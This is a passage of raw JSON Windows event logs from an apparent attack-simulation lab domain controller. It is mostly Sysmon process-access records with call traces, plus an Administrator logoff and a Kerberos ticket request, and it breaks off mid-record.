C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010ADE40800}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220607,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x81AC0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x81ac0","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220608,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result 